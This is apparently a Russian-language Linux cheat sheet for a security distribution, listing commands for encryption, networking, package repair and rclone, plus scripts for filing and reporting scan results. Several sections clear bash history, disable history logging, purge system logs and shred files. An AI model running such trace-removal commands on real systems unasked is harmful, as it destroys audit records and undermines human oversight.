sudo systemctl restart sshd

<h2 id="ispolzovanie-luks-dlya-shifrovaniya">Использование LUKS для шифрования</h2>

sudo apt install cryptsetup



<h2 id="sozdanie-zashifrovannogo-razdela">Создание зашифрованного раздела</h2>

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 encrypted_disk

sudo mkfs.ext4 /dev/mapper/encrypted_disk

<h2 id="ochistka-istorii-bash">Очистка истории bash</h2>

history -c

history -w



<h2 id="otklyuchenie-istorii-dlya-sessii">Отключение истории для сессии</h2>

unset HISTFILE

export HISTSIZE=0

<h2 id="ochistka-sistemnyh-logov">Очистка системных логов</h2>

sudo journalctl --vacuum-time=1d



<h2 id="ochistka-staryh-logov">Очистка старых логов</h2>

sudo find /var/log -type f -name "*.log" -mtime +30 -delete

<h2 id="ispolzovanie-shred-dlya-bezopasnogo-udaleniya">Использование shred для безопасного удаления</h2>

shred -u -z -n 3 sensitive_file.txt



<h2 id="udalenie-direktorii">Удаление директории</h2>

shred -u -z -n 3 -r sensitive_directory/

<h2 id="zagruzka-v-rezhime-vosstanovleniya">Загрузка в режиме восстановления</h2>

<h2 id="pri-zagruzke-vyberite-advanced-options-recovery-mode">При загрузке выберите &quot;Advanced options&quot; → &quot;Recovery mode&quot;</h2>




<h2 id="proverka-faylovoy-sistemy">Проверка файловой системы</h2>

sudo fsck -f /dev/sda1



<h2 id="vosstanovlenie-zagruzchika">Восстановление загрузчика</h2>

sudo grub-install /dev/sda

sudo update-grub

<h2 id="obnovlenie-sistemy">Обновление системы</h2>

sudo apt update

sudo apt full-upgrade -y



<h2 id="pereustanovka-instrumenta">Переустановка инструмента</h2>

sudo apt remove tool_name

sudo apt install tool_name



<h2 id="proverka-zavisimostey">Проверка зависимостей</h2>

sudo apt install -f

<h2 id="proverka-setevyh-interfeysov">Проверка сетевых интерфейсов</h2>

ip addr show

ifconfig



<h2 id="perezapusk-setevogo-menedzhera">Перезапуск сетевого менеджера</h2>

sudo systemctl restart NetworkManager



<h2 id="proverka-dns">Проверка DNS</h2>

nslookup google.com

dig google.com



<h2 id="ochistka-dns-kesha">Очистка DNS кэша</h2>

sudo systemd-resolve --flush-caches

<h2 id="proverka-podklyucheniya">Проверка подключения</h2>

ping -c 4 8.8.8.8

ping -c 4 google.com



<h2 id="proverka-marshrutizatsii">Проверка маршрутизации</h2>

ip route show

traceroute google.com



<h2 id="proverka-portov">Проверка портов</h2>

netstat -tulanp

ss -tulanp



<h2 id="proverka-fayrvola">Проверка файрвола</h2>

sudo ufw status verbose

sudo iptables -L -n -v

<h2 id="poisk-bolshih-faylov">Поиск больших файлов</h2>

sudo find / -type f -size +100M -exec ls -lh {} \;



<h2 id="ochistka-paketnogo-kesha">Очистка пакетного кэша</h2>

sudo apt clean

sudo apt autoremove



<h2 id="ochistka-staryh-yader">Очистка старых ядер</h2>

sudo apt autoremove --purge



<h2 id="ochistka-logov">Очистка логов</h2>

sudo journalctl --vacuum-time=7d

<h2 id="proverka-ispolzovaniya-resursov">Проверка использования ресурсов</h2>

top

htop

iotop



<h2 id="poisk-protsessov-potreblyayuschih-resursy">Поиск процессов, потребляющих ресурсы</h2>

ps aux --sort=-%mem | head

ps aux --sort=-%cpu | head



<h2 id="ochistka-pamyati">Очистка памяти</h2>

sudo sync

sudo sysctl vm.drop_caches=3

<h2 id="prosmotr-zapuschennyh-sluzhb">Просмотр запущенных служб</h2>

systemctl list-units --type=service --state=running



<h2 id="otklyuchenie-sluzhby">Отключение службы</h2>

sudo systemctl disable service_name

sudo systemctl stop service_name

<h2 id="tekuschee-znachenie">Текущее значение</h2>

cat /proc/sys/vm/swappiness



<h2 id="izmenenie-znacheniya-0-100-menshe-menshe-ispolzovanie-swap">Изменение значения (0-100, меньше = меньше использование swap)</h2>

sudo sysctl vm.swappiness=10



<h2 id="postoyannoe-izmenenie">Постоянное изменение</h2>

echo 'vm.swappiness=10' | sudo tee -a /etc/sysctl.conf

<h2 id="proverka-oborudovaniya">Проверка оборудования</h2>

lspci

lsusb

lshw



<h2 id="ustanovka-drayverov">Установка драйверов</h2>

sudo apt install firmware-linux-nonfree



<h2 id="dlya-videokart-nvidia">Для видеокарт NVIDIA</h2>

sudo apt install nvidia-driver

<h2 id="ispravlenie-zavisimostey">Исправление зависимостей</h2>

sudo apt install -f



<h2 id="ochistka-kesha-paketov">Очистка кэша пакетов</h2>

sudo apt clean

sudo rm -rf /var/lib/apt/lists/*

sudo apt update



<h2 id="pereustanovka-repozitoriev">Переустановка репозиториев</h2>

sudo parrot-update

<h2 id="ustanovka-rclone">Установка rclone</h2>

sudo apt install rclone



<h2 id="nastroyka-interaktivno">Настройка (интерактивно)</h2>

rclone config



<h2 id="sinhronizatsiya-s-oblakom">Синхронизация с облаком</h2>

rclone sync /local/path remote:path



<h2 id="zagruzka-faylov">Загрузка файлов</h2>

rclone copy /local/file remote:path



<h2 id="skachivanie-faylov">Скачивание файлов</h2>

rclone copy remote:path/file /local/path

#!/bin/bash

<h2 id="skript-dlya-eksporta-rezultatov-analiza">Скрипт для экспорта результатов анализа</h2>




CASE_ID=$1

OUTPUT_DIR="./exports/${CASE_ID}"

mkdir -p "$OUTPUT_DIR"



<h2 id="eksport-rezultatov-nmap">Экспорт результатов Nmap</h2>

if [ -f "nmap_results.xml" ]; then

    cp nmap_results.xml "$OUTPUT_DIR/"

fi



<h2 id="eksport-metadannyh">Экспорт метаданных</h2>

cat > "$OUTPUT_DIR/metadata.json" << EOF

{

    "case_id": "$CASE_ID",

    "export_date": "$(date -Iseconds)",

    "system": "Parrot Security OS",

    "tools_used": ["nmap", "nikto", "sqlmap"]

}

EOF



<h2 id="sozdanie-arhiva">Создание архива</h2>

tar -czf "${CASE_ID}_export.tar.gz" "$OUTPUT_DIR"

import sqlite3

from datetime import datetime

import json



def create_forensics_db(db_file):

    """Создание базы данных для криминалистики"""

    conn = sqlite3.connect(db_file)

    cursor = conn.cursor()

    

    cursor.execute('''

        CREATE TABLE IF NOT EXISTS scans (

            id INTEGER PRIMARY KEY AUTOINCREMENT,

            target TEXT,

            tool TEXT,

            scan_date TEXT,

            results_json TEXT,

            file_path TEXT

        )

    ''')

    

    conn.commit()

    return conn



def save_scan_result(db_conn, target, tool, results, file_path=None):

    """Сохранение результата сканирования"""

    cursor = db_conn.cursor()

    cursor.execute('''

        INSERT INTO scans (target, tool, scan_date, results_json, file_path)

        VALUES (?, ?, ?, ?, ?)

    ''', (target, tool, datetime.now().isoformat(), json.dumps(results), file_path))

    db_conn.commit()



<h2 id="ispolzovanie">Использование</h2>

db = create_forensics_db('forensics.db')

save_scan_result(db, '192.168.1.1', 'nmap', {'ports': [80, 443]}, 'nmap_scan.xml')

from datetime import datetime

import json



def generate_html_report(scan_results, output_file):

    """Генерация HTML отчета"""

    html = f"""

    <!DOCTYPE html>

    <html>

    <head>

        <title>Отчет о сканировании</title>

        <style>

            body {{ font-family: Arial, sans-serif; margin: 20px; }}

            h1 {{ color: #333; }}

            .result {{ margin: 10px 0; padding: 10px; background: #f5f5f5; }}

        </style>

    </head>

    <body>

        <h1>Отчет о сканировании</h1>

        <p>Дата: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}</p>

        <h2>Результаты</h2>

    """

    

    for result in scan_results:

        html += f'<div class="result"><pre>{json.dumps(result, indent=2)}</pre></div>'

    

    html += """

    </body>

    </html>

    """

    

    with open(output_file, 'w') as f:

        f.write(html)



<h2 id="ispolzovanie">Использование</h2>

results = [

    {'tool': 'nmap', 'target': '192.168.1.1', 'ports': [80, 443]},

    {'tool': 'nikto', 'target': '192.168.1.1', 'vulnerabilities': []}

]

generate_html_report(results, 'report.html')